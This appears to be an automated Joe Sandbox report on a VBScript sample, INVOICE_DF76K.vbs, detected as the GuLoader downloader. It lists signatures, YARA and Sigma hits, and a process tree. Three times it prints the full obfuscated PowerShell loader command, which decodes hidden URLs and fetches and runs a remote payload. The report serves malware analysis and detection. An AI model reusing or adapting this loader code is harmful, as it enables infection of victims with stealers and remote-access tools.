Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
INVOICE_DF76K.vbs

Overview

General Information

Sample name:INVOICE_DF76K.vbs
Analysis ID:1500268
MD5:af84a827601b117c89f0fe2a30604669
SHA1:6844a66c86b23a67429aee33094ba33bc9c61fe6
SHA256:48c37299c9515e8cf91ff1faa09135014ae7303a88aea29e1d2298398200617f
Tags:vbs
Infos:

Detection

GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Powershell download and execute
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Obfuscated command line found
Sample has a suspicious name (potential lure to open the executable)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Very long command line found
Writes or reads registry keys via WMI
Wscript starts Powershell (via cmd or directly)
Abnormal high CPU Usage
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 6184 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\INVOICE_DF76K.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • WmiPrvSE.exe (PID: 4432 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • powershell.exe (PID: 1600 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentUICulture) {$Afrikaans='SUBsTR';$Semiprofanity26++;}$Afrikaans+='ing';Function konstruktive($Metaludlser){$Arbejdernederlaget=$Metaludlser.Length-$Semiprofanity26;For( $Outlimn=4;$Outlimn -lt $Arbejdernederlaget;$Outlimn+=5){$junking+=$Metaludlser.$Afrikaans.'Invoke'( $Outlimn, $Semiprofanity26);}$junking;}function Kreditorselskabs($Programeksempler){ . ($Ecumenicalism) ($Programeksempler);}$blyindholds=konstruktive 'AtlaMimmooDiamz eneiAabelQuitlCasuaAu,i/ res5,uma.Seas0Uroc con(CuriW eveiEmainSu idFiskoTelewS,odsPeng MedlN ,umTGale Bomb1Cone0c.ff.Adj 0Incu;pa.t Is,eWByggi.ndfnEffe6rel.4 sp,;B.tt ,uggxGome6Ency4 Unc;Fuci Unhar Appv nch: uja1Semi2Dayf1Opri.Solu0Awni)tr.l EtikGungieHeavcSmukkEnfooTors/Skjo2Tppe0Hall1 Bio0Glid0Batt1gast0Sa,g1Osmi Do FSuggiOplyr SkrePachf AndoBavixresc/ Mlk1for 2Sort1Vris.Skum0Shel ';$Begazes=konstruktive 'Pr.sUA resEc ieS unrE.tl-SvamATevagPlo eF,ern .uvtFu d ';$Ideogrammerne=konstruktive ' S,ahOvert InatUdjvpRestsByst:Fin /Fer,/Ma,taDiffdHugojNonruSew,nLytetMeloi EftaStre.MustrDi.kuMu,i.For,cGil.oToilmS ur/P.rtwNedspUnob-GonaiSnornKlimc FodlStyruspard ,coeCystsSnek/Ga giSolam IntgB,op/,utsARetspTrempBroolOmbyiO.spa Ln.nHum.c Ge eHomesBlod.MakrsPe,rmBeskiGeni>Nat,hDe itDecatBolspDeessspol:,upe/Inco/UnmoaL,esmRuddbMe ny Penv OnoespadrSnd cTraneGr.n.Bac,cforloForsm med/AuteAShempJawfpFoehl C.ri Fe,asyrln QuicAnsteA.iosBich.PennsPaabm Doli or ';$Toddyskes=konstruktive 'A,um> Tra ';$Ecumenicalism=konstruktive 'e asiK.lleDomix ilr ';$Drsprkkernes='Nonnutritiousness';$Telemestre = konstruktive 'Opsae Ovec inrhl,tco Se, Con%Om raD.umpsvvepAfstdHuipa RattHermaCel.% opn\BogbSDiskpFrili BlisOad eK.llf Sneiinv skok,kUret.PrecP ,anuHarlr erb Fejl&Ta p&Hege Ky.ieNonec VedhI.veoU,de Prot Li. ';Kreditorselskabs (konstruktive 'Inde$ContgMa clUdeloregabRoseaAmbrl Gra:.iroaKalinLetvfMemblDigiyCituvKlapnAmniiGtefnFla,gVand=Genn(TurtcBlommOctadSym, B eb/BicecAnni Un.e$NiteT Rh.eTea.lB.dre Betm O.veFortsSviptOrdlr An.eDr n)Unsl ');Kreditorselskabs (konstruktive 'Blan$Ferrg,uthlU.saoJejub,nigaC.rnlFind:ResoVS nnec,annTriqaVingl,inenNoneeCouns orfsSkif=Apos$PostI ,aadRen,eSummoBarngPilar BanaDe.emA,famFoure Skyr Syln SoaeMult. G,asBrdrpOmarlIn.oi UdbtRadi(Sten$NapkTFjero ,ysdmambdOverySacesPcflkLivieAktusAnt.)Strb ');Kreditorselskabs (konstruktive 'Frug[ iluNVejre P.utB.tr.FolkSStope MycrMarivEn,yiprfactraneArtiP O.soSammiJernnDicetNeo MAk,iaExpln benahaang Brne,sparStt,]Figu: Ene:bortSRetse ovic K,auLater .iviassetVelgysmerP BraroveroGloptVanqoUn.acBlowoSamslPetr Me,l=Fane T k[BenzNGuare .iptNonv.fienSKa eeForscProluP ftrGaloi Solt Desy osePSl.nrCarboSkurtCorooF,rsc PoloKl,alNat.TRegny racpVaadeSpin]F,ti:kine:SmkkTplanlCakesDarw1Ana,2over ');$Ideogrammerne=$Venalness[0];$Pickett= (konstruktive 'Palf$ SkogFraclCou ohospbTeraaDelilBrud:SavoKAffao Habn P.lk S.uu vakr.seurGl.ne ChanSemicSkr,eGrubm Fors ProsMiskiTjregAyl.e DatsSerr1Pect3Todk3 Di.=TheoNPenseAttewEl c-TipsOAnombSygnj Alhe ampc.aiptS.ri ForbS arry LibsFliptPerne,tavm Pro.LaviNSchneI.dbtSwee. nstWMetaeBaalbIganCSnedl Tolit,mmeC ntnHag,t');$Pickett+=$anflyvning[1];Kreditorselskabs ($Pickett);Kreditorselskabs (konstruktive 'Udvi$ZofiKexpeoAlamnKolok B,iuDaltrStrar ToleD iznLupic.owee ethmdrugsClocsDiali afagPa.ieStatsAnti1Chry3Advo3Rep,. imoH,geneUh.ga M ddgayneLattrG,ldsKonj[Udsk$AquaBCo,ueass,g,eceaW.irzJu,eeBioes Sho]Sold=Cpah$ AchbErmilAttayDiasiMestnB.bbdKogehI,exo roslclifd Rals sho ');$Grnseovergangs=konstruktive 'Bure$ T.pK Spao,iqunAllik.vveuunsmrDiserGra eIntenAnimca.rbe ivtmIsobsSludsRiggi A.lgskomeSynasO.lo1 Brs3Rej 3Mund.Fol.DEkspoBolvw.revnA,lolIncoosquiaPalsdRedrFneeliOverlF rge,ane(Sti $,unjIDu.fdDi.mePrstoDagugGr.srJappaKlovmKen mSameeSpr,rKonvnT xpeSky ,Siry$ DivCA,ealSub,iWochn Lowo .herKremhA icoC,asm CrobQu.niCotscAsso)Smrk ';$Clinorhombic=$anflyvning[0];Kreditorselskabs (konstruktive 'Flav$Hig,gThe.lB.ckoSeasb Mora Ampl ine: Sk.LFrdie UsanUdbygPod,tUndehCooni ,ileVu,csButttBo.t= Gil(ReveTInthe El.s Sp.tOutr-DermPStiraLimbt ComhOxyh Indu$UnscCPhanl DesiSquanEgunoAgerr naahForbo B.nmFirebDehuixyl,cSam,)Morg ');while (!$Lengthiest) {Kreditorselskabs (konstruktive '.rih$ orsgK allBlano Prab,ppeaOp rl hex:TranF leyo BanrGennbShi l igdS.altS,vnemagns.mor= nab$LnudtSti rAgtbu KineDiss ') ;Kreditorselskabs $Grnseovergangs;Kreditorselskabs (konstruktive ' RaaSCatat Thia.ejsrDevet Bet-MorbSGen l eleD.baeAttepTall N.nv4Ydre ');Kreditorselskabs (konstruktive 'Over$Ga,vgBogslUnphoPel.b.hahaIagtlOmfa:Me dL UlyeBu,onSubtgAutot D thUnapi Fe eMiscs Fort Ih = Rat(BrisTBaade JarsSnoht.ffa- N hPMotla P,et V,ahL,ka Til$ TonCKolllbestiDueln Ve,oOperrSkr,hUsaeo D,em.alib UneiEleccUdbu) Arb ') ;Kreditorselskabs (konstruktive ' The$,mdegKonsl lboOliebGeneaFngsl ini:TermO Kl.p.ohrtCramearabg,risnDodmeNedbdUdbue Arg=Unwa$ ,jogSemelPerio Sk b Flaa.hefl Imm:.rewDAmmarOrtiuUlejn FlagNonuaFormr S.e+Fai,+Unga%,abe$S.amV dske PannTranaUnsilAnosnDitaeStensCivisdisc.KalkcB.dioArteuKaldnBromtBogt ') ;$Ideogrammerne=$Venalness[$Optegnede];}$Differ=319698;$Cameroonian=28765;Kreditorselskabs (konstruktive 'Pa.h$ ikgUncol feroTritbHoeja.onelSlut: .ncUM.trnF rmf,exeokiwilNam,d AfraRuefbSpinlSquieOrdr Su s=D.ri engdGAkt,e AzotSet,- GenCDecooViran vigt Fi e StenU satKons Jeaa$KommCG,psl Pa,iTebrnAnnuo.unkrSqu.hGuldoSabbm .arb Ep,iOv.rcanod ');Kreditorselskabs (konstruktive 'nog.$ rhvgThaylVrdio AffbLallaHaymlRhym:TurkOThelpAlpasBreeaVi amomsklhaariMil nSanggchelsProgbSkole,orhhLilloSagalSukkdGovee AvlrGtteeRabb Du e=Aarm Omkl[O,ciSFalsyD,dosSugetForre p,emFrib. NorCTa uoHuben AntvT llePromrL.tet.nop]Swai: Aus:MenaF SdurShifoB,rom MedBbureaMonosG raeW st6 mil4FstoSM,ustEnsorDogmiBrddnFlo,gSpnd( Tv $deduUUnimnSym fRaasoEl,cl .ekdBunnaUka.bRocklRe.reUn.i)Fors ');Kreditorselskabs (konstruktive ' Una$Su,egsul.lf.ldoFarmbMythaP,eslDust: HybSDe,etBestrScl mFo,efBan oc onrLynsdDemoe S,nl ndeDobbrGnideBurr ,pop= R f Leas[PsoaS comyBipes h,bt UdgeMycem Scu. ollTW iseDiabxNonrtRati.ZymoE.andnFaldc E,poPawndSikkiTr.nn K,sgInge]Papu:Hige:SyllA luvS TerCBro.I nbrI,den. marGTitueUdbrtPattSCeretVizirFdekiAmarnSp.ng ,ut(Synt$ImprOEn.opAnemsSubcaAllomblinlTuchiHenwn SydgRutss leb.ermeAfbrh Unioskr l tredB.lfeAnomrSkoveYder)Lynx ');Kreditorselskabs (konstruktive 'Kupl$parogU,bul Indo.ksabForsaDrejlNyma: f rUBrtsnObjedSdnieHicktHjemeTrear As,mPyoci Vaandecla rojtUn,richemo.tatnSorr=Vulc$OpklSInfotAchrrClanm,ateferkeoelecrTor.d .vae FunlAcese SacrVid,e,ema.TatasSel.uSku bOthesTzartLegarDodoinvn,nSorggKon,(I,ea$Ku sDbrejiDokufForwfU dae.ebarlinj,E.te$ AppCforhaNovemLydkeBortr U.ioVinio C,engrnniViziaT.synMa t)Lip ');Kreditorselskabs $Undetermination;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 940 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 5368 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Spisefisk.Pur && echo t" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 5572 cmdline: "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentUICulture) {$Afrikaans='SUBsTR';$Semiprofanity26++;}$Afrikaans+='ing';Function konstruktive($Metaludlser){$Arbejdernederlaget=$Metaludlser.Length-$Semiprofanity26;For( $Outlimn=4;$Outlimn -lt $Arbejdernederlaget;$Outlimn+=5){$junking+=$Metaludlser.$Afrikaans.'Invoke'( $Outlimn, $Semiprofanity26);}$junking;}function Kreditorselskabs($Programeksempler){ . ($Ecumenicalism) ($Programeksempler);}$blyindholds=konstruktive 'AtlaMimmooDiamz eneiAabelQuitlCasuaAu,i/ res5,uma.Seas0Uroc con(CuriW eveiEmainSu idFiskoTelewS,odsPeng MedlN ,umTGale Bomb1Cone0c.ff.Adj 0Incu;pa.t Is,eWByggi.ndfnEffe6rel.4 sp,;B.tt ,uggxGome6Ency4 Unc;Fuci Unhar Appv nch: uja1Semi2Dayf1Opri.Solu0Awni)tr.l EtikGungieHeavcSmukkEnfooTors/Skjo2Tppe0Hall1 Bio0Glid0Batt1gast0Sa,g1Osmi Do FSuggiOplyr SkrePachf AndoBavixresc/ Mlk1for 2Sort1Vris.Skum0Shel ';$Begazes=konstruktive 'Pr.sUA resEc ieS unrE.tl-SvamATevagPlo eF,ern .uvtFu d ';$Ideogrammerne=konstruktive ' S,ahOvert InatUdjvpRestsByst:Fin /Fer,/Ma,taDiffdHugojNonruSew,nLytetMeloi EftaStre.MustrDi.kuMu,i.For,cGil.oToilmS ur/P.rtwNedspUnob-GonaiSnornKlimc FodlStyruspard ,coeCystsSnek/Ga giSolam IntgB,op/,utsARetspTrempBroolOmbyiO.spa Ln.nHum.c Ge eHomesBlod.MakrsPe,rmBeskiGeni>Nat,hDe itDecatBolspDeessspol:,upe/Inco/UnmoaL,esmRuddbMe ny Penv OnoespadrSnd cTraneGr.n.Bac,cforloForsm med/AuteAShempJawfpFoehl C.ri Fe,asyrln QuicAnsteA.iosBich.PennsPaabm Doli or ';$Toddyskes=konstruktive 'A,um> Tra ';$Ecumenicalism=konstruktive 'e asiK.lleDomix ilr ';$Drsprkkernes='Nonnutritiousness';$Telemestre = konstruktive 'Opsae Ovec inrhl,tco Se, Con%Om raD.umpsvvepAfstdHuipa RattHermaCel.% opn\BogbSDiskpFrili BlisOad eK.llf Sneiinv skok,kUret.PrecP ,anuHarlr erb Fejl&Ta p&Hege Ky.ieNonec VedhI.veoU,de Prot Li. ';Kreditorselskabs (konstruktive 'Inde$ContgMa clUdeloregabRoseaAmbrl Gra:.iroaKalinLetvfMemblDigiyCituvKlapnAmniiGtefnFla,gVand=Genn(TurtcBlommOctadSym, B eb/BicecAnni Un.e$NiteT Rh.eTea.lB.dre Betm O.veFortsSviptOrdlr An.eDr n)Unsl ');Kreditorselskabs (konstruktive 'Blan$Ferrg,uthlU.saoJejub,nigaC.rnlFind:ResoVS nnec,annTriqaVingl,inenNoneeCouns orfsSkif=Apos$PostI ,aadRen,eSummoBarngPilar BanaDe.emA,famFoure Skyr Syln SoaeMult. G,asBrdrpOmarlIn.oi UdbtRadi(Sten$NapkTFjero ,ysdmambdOverySacesPcflkLivieAktusAnt.)Strb ');Kreditorselskabs (konstruktive 'Frug[ iluNVejre P.utB.tr.FolkSStope MycrMarivEn,yiprfactraneArtiP O.soSammiJernnDicetNeo MAk,iaExpln benahaang Brne,sparStt,]Figu: Ene:bortSRetse ovic K,auLater .iviassetVelgysmerP BraroveroGloptVanqoUn.acBlowoSamslPetr Me,l=Fane T k[BenzNGuare .iptNonv.fienSKa eeForscProluP ftrGaloi Solt Desy osePSl.nrCarboSkurtCorooF,rsc PoloKl,alNat.TRegny racpVaadeSpin]F,ti:kine:SmkkTplanlCakesDarw1Ana,2over ');$Ideogrammerne=$Venalness[0];$Pickett= (konstruktive 'Palf$ SkogFraclCou ohospbTeraaDelilBrud:SavoKAffao Habn P.lk S.uu vakr.seurGl.ne ChanSemicSkr,eGrubm Fors ProsMiskiTjregAyl.e DatsSerr1Pect3Todk3 Di.=TheoNPenseAttewEl c-TipsOAnombSygnj Alhe ampc.aiptS.ri ForbS arry LibsFliptPerne,tavm Pro.LaviNSchneI.dbtSwee. nstWMetaeBaalbIganCSnedl Tolit,mmeC ntnHag,t');$Pickett+=$anflyvning[1];Kreditorselskabs ($Pickett);Kreditorselskabs (konstruktive 'Udvi$ZofiKexpeoAlamnKolok B,iuDaltrStrar ToleD iznLupic.owee ethmdrugsClocsDiali afagPa.ieStatsAnti1Chry3Advo3Rep,. imoH,geneUh.ga M ddgayneLattrG,ldsKonj[Udsk$AquaBCo,ueass,g,eceaW.irzJu,eeBioes Sho]Sold=Cpah$ AchbErmilAttayDiasiMestnB.bbdKogehI,exo roslclifd Rals sho ');$Grnseovergangs=konstruktive 'Bure$ T.pK Spao,iqunAllik.vveuunsmrDiserGra eIntenAnimca.rbe ivtmIsobsSludsRiggi A.lgskomeSynasO.lo1 Brs3Rej 3Mund.Fol.DEkspoBolvw.revnA,lolIncoosquiaPalsdRedrFneeliOverlF rge,ane(Sti $,unjIDu.fdDi.mePrstoDagugGr.srJappaKlovmKen mSameeSpr,rKonvnT xpeSky ,Siry$ DivCA,ealSub,iWochn Lowo .herKremhA icoC,asm CrobQu.niCotscAsso)Smrk ';$Clinorhombic=$anflyvning[0];Kreditorselskabs (konstruktive 'Flav$Hig,gThe.lB.ckoSeasb Mora Ampl ine: Sk.LFrdie UsanUdbygPod,tUndehCooni ,ileVu,csButttBo.t= Gil(ReveTInthe El.s Sp.tOutr-DermPStiraLimbt ComhOxyh Indu$UnscCPhanl DesiSquanEgunoAgerr naahForbo B.nmFirebDehuixyl,cSam,)Morg ');while (!$Lengthiest) {Kreditorselskabs (konstruktive '.rih$ orsgK allBlano Prab,ppeaOp rl hex:TranF leyo BanrGennbShi l igdS.altS,vnemagns.mor= nab$LnudtSti rAgtbu KineDiss ') ;Kreditorselskabs $Grnseovergangs;Kreditorselskabs (konstruktive ' RaaSCatat Thia.ejsrDevet Bet-MorbSGen l eleD.baeAttepTall N.nv4Ydre ');Kreditorselskabs (konstruktive 'Over$Ga,vgBogslUnphoPel.b.hahaIagtlOmfa:Me dL UlyeBu,onSubtgAutot D thUnapi Fe eMiscs Fort Ih = Rat(BrisTBaade JarsSnoht.ffa- N hPMotla P,et V,ahL,ka Til$ TonCKolllbestiDueln Ve,oOperrSkr,hUsaeo D,em.alib UneiEleccUdbu) Arb ') ;Kreditorselskabs (konstruktive ' The$,mdegKonsl lboOliebGeneaFngsl ini:TermO Kl.p.ohrtCramearabg,risnDodmeNedbdUdbue Arg=Unwa$ ,jogSemelPerio Sk b Flaa.hefl Imm:.rewDAmmarOrtiuUlejn FlagNonuaFormr S.e+Fai,+Unga%,abe$S.amV dske PannTranaUnsilAnosnDitaeStensCivisdisc.KalkcB.dioArteuKaldnBromtBogt ') ;$Ideogrammerne=$Venalness[$Optegnede];}$Differ=319698;$Cameroonian=28765;Kreditorselskabs (konstruktive 'Pa.h$ ikgUncol feroTritbHoeja.onelSlut: .ncUM.trnF rmf,exeokiwilNam,d AfraRuefbSpinlSquieOrdr Su s=D.ri engdGAkt,e AzotSet,- GenCDecooViran vigt Fi e StenU satKons Jeaa$KommCG,psl Pa,iTebrnAnnuo.unkrSqu.hGuldoSabbm .arb Ep,iOv.rcanod ');Kreditorselskabs (konstruktive 'nog.$ rhvgThaylVrdio AffbLallaHaymlRhym:TurkOThelpAlpasBreeaVi amomsklhaariMil nSanggchelsProgbSkole,orhhLilloSagalSukkdGovee AvlrGtteeRabb Du e=Aarm Omkl[O,ciSFalsyD,dosSugetForre p,emFrib. NorCTa uoHuben AntvT llePromrL.tet.nop]Swai: Aus:MenaF SdurShifoB,rom MedBbureaMonosG raeW st6 mil4FstoSM,ustEnsorDogmiBrddnFlo,gSpnd( Tv $deduUUnimnSym fRaasoEl,cl .ekdBunnaUka.bRocklRe.reUn.i)Fors ');Kreditorselskabs (konstruktive ' Una$Su,egsul.lf.ldoFarmbMythaP,eslDust: HybSDe,etBestrScl mFo,efBan oc onrLynsdDemoe S,nl ndeDobbrGnideBurr ,pop= R f Leas[PsoaS comyBipes h,bt UdgeMycem Scu. ollTW iseDiabxNonrtRati.ZymoE.andnFaldc E,poPawndSikkiTr.nn K,sgInge]Papu:Hige:SyllA luvS TerCBro.I nbrI,den. marGTitueUdbrtPattSCeretVizirFdekiAmarnSp.ng ,ut(Synt$ImprOEn.opAnemsSubcaAllomblinlTuchiHenwn SydgRutss leb.ermeAfbrh Unioskr l tredB.lfeAnomrSkoveYder)Lynx ');Kreditorselskabs (konstruktive 'Kupl$parogU,bul Indo.ksabForsaDrejlNyma: f rUBrtsnObjedSdnieHicktHjemeTrear As,mPyoci Vaandecla rojtUn,richemo.tatnSorr=Vulc$OpklSInfotAchrrClanm,ateferkeoelecrTor.d .vae FunlAcese SacrVid,e,ema.TatasSel.uSku bOthesTzartLegarDodoinvn,nSorggKon,(I,ea$Ku sDbrejiDokufForwfU dae.ebarlinj,E.te$ AppCforhaNovemLydkeBortr U.ioVinio C,engrnniViziaT.synMa t)Lip ');Kreditorselskabs $Undetermination;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • cmd.exe (PID: 6500 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Spisefisk.Pur && echo t" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000007.00000002.3337285382.0000000008D80000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
    00000007.00000002.3337411783.000000000C8EC000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
      00000007.00000002.3322827054.00000000060CE000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
        00000003.00000002.3408756335.00000266CF20D000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
          Process Memory Space: powershell.exe PID: 1600JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Click to see the 3 entries

            Other

            SourceRuleDescriptionAuthorStrings
            amsi64_1600.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
              amsi32_5572.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
              • 0xe21d:$b2: ::FromBase64String(
              • 0xd283:$s1: -join
              • 0x6a2f:$s4: +=
              • 0x6af1:$s4: +=
              • 0xad18:$s4: +=
              • 0xce35:$s4: +=
              • 0xd11f:$s4: +=
              • 0xd265:$s4: +=
              • 0x16bdd:$s4: +=
              • 0x16c5d:$s4: +=
              • 0x16d23:$s4: +=
              • 0x16da3:$s4: +=
              • 0x16f79:$s4: +=
              • 0x16ffd:$s4: +=
              • 0xdab8:$e4: Get-WmiObject
              • 0xdca7:$e4: Get-Process
              • 0xdcff:$e4: Start-Process
              • 0x1788d:$e4: Get-Process

              Sigma Signatures

              System Summary

              barindex
              Sigma detected: WScript or CScript Dropper
              Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\INVOICE_DF76K.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\INVOICE_DF76K.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\INVOICE_DF76K.vbs", ProcessId: 6184, ProcessName: wscript.exe
              Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
              Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\INVOICE_DF76K.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\INVOICE_DF76K.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\INVOICE_DF76K.vbs", ProcessId: 6184, ProcessName: wscript.exe
              Sigma detected: Non Interactive PowerShell Process Spawned
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentUICulture) {$Afrikaans='SUBsTR';$Semiprofanity26++;}$Afrikaans+='ing';Function konstruktive($Metaludlser){$Arbejdernederlaget=$Metaludlser.Length-$Semiprofanity26;For( $Outlimn=4;$Outlimn -lt $Arbejdernederlaget;$Outlimn+=5){$junking+=$Metaludlser.$Afrikaans.'Invoke'( $Outlimn, $Semiprofanity26);}$junking;}function Kreditorselskabs($Programeksempler){ . ($Ecumenicalism) ($Programeksempler);}$blyindholds=konstruktive 'AtlaMimmooDiamz eneiAabelQuitlCasuaAu,i/ res5,uma.Seas0Uroc con(CuriW eveiEmainSu idFiskoTelewS,odsPeng MedlN ,umTGale Bomb1Cone0c.ff.Adj 0Incu;pa.t Is,eWByggi.ndfnEffe6rel.4 sp,;B.tt ,uggxGome6Ency4 Unc;Fuci Unhar Appv nch: uja1Semi2Dayf1Opri.Solu0Awni)tr.l EtikGungieHeavcSmukkEnfooTors/Skjo2Tppe0Hall1 Bio0Glid0Batt1gast0Sa,g1Osmi Do FSuggiOplyr SkrePachf AndoBavixresc/ Mlk1for 2Sort1Vris.Skum0Shel ';$Begazes=konstruktive 'Pr.sUA resEc ieS unrE.tl-SvamATevagPlo eF,ern .uvtFu d ';$Ideogrammerne=konstruktive ' S,ahOvert InatUdjvpRestsByst:Fin /Fer,/Ma,taDiffdHugojNonruSew,nLytetMeloi EftaStre.MustrDi.kuMu,i.For,cGil.oToilmS ur/P.rtwNedspUnob-GonaiSnornKlimc FodlStyruspard ,coeCystsSnek/Ga giSolam IntgB,op/,utsARetspTrempBroolOmbyiO.spa Ln.nHum.c Ge eHomesBlod.MakrsPe,rmBeskiGeni>Nat,hDe itDecatBolspDeessspol:,upe/Inco/UnmoaL,esmRuddbMe ny Penv OnoespadrSnd cTraneGr.n.Bac,cforloForsm med/AuteAShempJawfpFoehl C.ri Fe,asyrln QuicAnsteA.iosBich.PennsPaabm Doli or ';$Toddyskes=konstruktive 'A,um> Tra ';$Ecumenicalism=konstruktive 'e asiK.lleDomix ilr ';$Drsprkkernes='Nonnutritiousness';$Telemestre = konstruktive 'Opsae Ovec inrhl,tco Se, Con%Om raD.umpsvvepAfstdHuipa RattHermaCel.% opn\BogbSDiskpFrili BlisOad eK.llf Sneiinv skok,kUret.PrecP ,anuHarlr erb Fejl&Ta p&Hege Ky.ieNonec VedhI.veoU,de Prot Li. ';Kreditorselskabs (konstruktive 'Inde$ContgMa clUdeloregabRoseaAmbrl Gra:.iroaKalinLetvfMemblDigiyCituvKlapnAmniiGtefnFla,gVand=Genn(TurtcBlommOctadSym, B eb/BicecAnni Un.e$NiteT Rh.eTea.lB.dre Betm O.veFortsSviptOrdlr An.eDr n)Unsl ');Kreditorselskabs (konstruktive 'Blan$Ferrg,uthlU.saoJejub,nigaC.rnlFind:ResoVS nnec,annTriqaVingl,inenNoneeCouns orfsSkif=Apos$PostI ,aadRen,eSummoBarngPilar BanaDe.emA,famFoure Skyr Syln SoaeMult. G,asBrdrpOmarlIn.oi UdbtRadi(Sten$NapkTFjero ,ysdmambdOverySacesPcflkLivieAktusAnt.)Strb ');Kreditorselskabs (konstruktive 'Frug[ iluNVejre P.utB.tr.FolkSStope MycrMarivEn,yiprfactraneArtiP O.soSammiJernnDicetNeo MAk,iaExpln benahaang Brne,sparStt,]Figu: Ene:bortSRetse ovic K,auLater .iviassetVelgysmerP BraroveroGloptVanqoUn.acBlowoSamslPetr Me,l=Fane T k[BenzNGuare .iptNonv.fienSKa eeForscProluP ftrGaloi Solt Desy osePSl.nrCarboSkurtCorooF,rsc PoloKl,alNat.TRegny racpVaadeSpin]F,ti:kine:SmkkTplanlCakesDarw1Ana,2over ');$Ideogrammerne=$Venalness[0];$Pickett= (konstruktive 'Palf$ SkogFraclCou ohospbTeraaDelilBrud:SavoKAffao Habn P.lk S.uu vakr.seurGl.ne ChanSemicSkr,eGrubm Fors ProsMiskiTjregAyl.e DatsSerr1Pect3Todk3

              Suricata Signatures

              No Suricata rule has matched

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.3% probability
              Source: unknownHTTPS traffic detected: 185.221.216.115:443 -> 192.168.2.5:49705 version: TLS 1.2
              Source: Binary string: tem.Core.pdbo source: powershell.exe, 00000007.00000002.3329236621.0000000007A2D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: em.Core.pdb source: powershell.exe, 00000007.00000002.3329236621.0000000007A2D000.00000004.00000020.00020000.00000000.sdmp
